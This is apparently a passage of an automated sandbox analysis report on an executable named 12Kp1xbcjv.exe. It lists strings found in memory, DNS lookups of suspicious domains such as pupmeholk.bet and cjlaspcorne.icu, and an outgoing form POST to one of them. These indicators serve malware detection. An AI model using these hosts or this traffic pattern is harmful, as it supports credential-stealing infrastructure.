charset=UTF-8Content-Type36132Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 17 Mar 2025 00:04:14 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1209490481.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1210405244.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209096840.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: amaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1209490481.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1210405244.0000000003A3B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209096840.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: amaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=Nonesessionid=d575ff83348194aad1c461a7; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type36132Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 17 Mar 2025 00:04:17 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/; equals www.youtube.com (Youtube)
          Source: global trafficDNS traffic detected: DNS query: t.me
          Source: global trafficDNS traffic detected: DNS query: crosshairc.life
          Source: global trafficDNS traffic detected: DNS query: mrodularmall.top
          Source: global trafficDNS traffic detected: DNS query: jowinjoinery.icu
          Source: global trafficDNS traffic detected: DNS query: legenassedk.top
          Source: global trafficDNS traffic detected: DNS query: htardwarehu.icu
          Source: global trafficDNS traffic detected: DNS query: cjlaspcorne.icu
          Source: global trafficDNS traffic detected: DNS query: bugildbett.top
          Source: global trafficDNS traffic detected: DNS query: weaponrywo.digital
          Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
          Source: global trafficDNS traffic detected: DNS query: pupmeholk.bet
          Source: unknownHTTP traffic detected: POST /pLoska HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: pupmeholk.bet
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1344891617.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6F000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A67000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A7B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345155925.000000000089D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000D8F000.00000040.00000001.01000000.00000003.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000EF4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1345259468.0000000000D8F000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1236351560.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bugildbett.top/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjlaspcorne.icu/DbIps
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cjlaspcorne.icu/DbIpsg
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1267206396.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1267258630.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266003750.00000000007E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261499186.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236059087.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197714450.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197687158.0000000003A54000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A6B000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A77000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=V4P4q3q732
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=N4H9vOOxi8kG&l=english&am
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=e
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 